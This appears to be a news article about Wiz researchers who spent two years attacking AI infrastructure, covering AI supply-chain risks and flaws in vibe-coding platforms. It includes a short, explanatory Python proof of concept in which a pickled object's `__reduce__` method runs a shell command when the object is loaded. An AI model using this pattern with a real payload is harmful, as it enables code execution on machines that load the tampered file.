Two years ago, Hillai Ben Sasson and Dan Segev set out to hack AI infrastructure in the hope of finding vulnerabilities. They were surprised by how far they got: they compromised almost every major AI platform they targeted. The two researchers wanted to test their theories on how to attack the AI infrastructure being deployed as part of foundation models, AI services, and internal AI projects.
Both are employed by cloud-security company Wiz, where they work in offensive and defensive research, respectively. What began as straightforward attacks on the AI supply chain, such as abusing the popular Pickle serialization format to execute arbitrary code, grew into a thorough threat analysis spanning five layers of the AI stack.
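The Pickle risk the researchers abused is a well-documented property of Python's serialization format: loading an untrusted pickle can run attacker-supplied code. The minimal sketch below is illustrative only and is not taken from Wiz's research; it shows the standard `__reduce__` mechanism that makes pickled model files dangerous to load.

```python
import os
import pickle


class MaliciousModel:
    # pickle calls __reduce__ when serializing this object; whatever
    # callable it returns is invoked again at deserialization time.
    def __reduce__(self):
        # Harmless stand-in for attacker-controlled code execution.
        return (os.system, ("echo pickle payload executed",))


# Attacker crafts the "model" file.
payload = pickle.dumps(MaliciousModel())

# Victim only has to load it for the command to run.
pickle.loads(payload)
```

This is why loading untrusted pickled model weights is widely treated as equivalent to running untrusted code.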
At the forthcoming RSAC Conference in March, they intend to share the insights gained from their two years of research. Perhaps the most crucial lesson: Segev, a security architect in Wiz's Office of the CTO, advises concentrating on the infrastructure used to host, train, and operate AI services rather than on prompt-injection attacks.

## The Inadequate Security of Vibe Coding

The application layer, the third level in the researchers' model, suffers not only from prompt injection but also from problems with vibe-coding platforms such as Base44.
Wiz researchers discovered a flaw that could have given attackers access to any private enterprise application. Vibe-coding platforms in general have a poor security track record, Segev says.
"We don't have exact numbers, but we were able to hack almost every vibe-coded app we set out to look for in minutes," he says. In fact, "AI security is — I don't want to say broken — but it's really compromised at the infrastructure layer." The researchers also added two more layers to their model.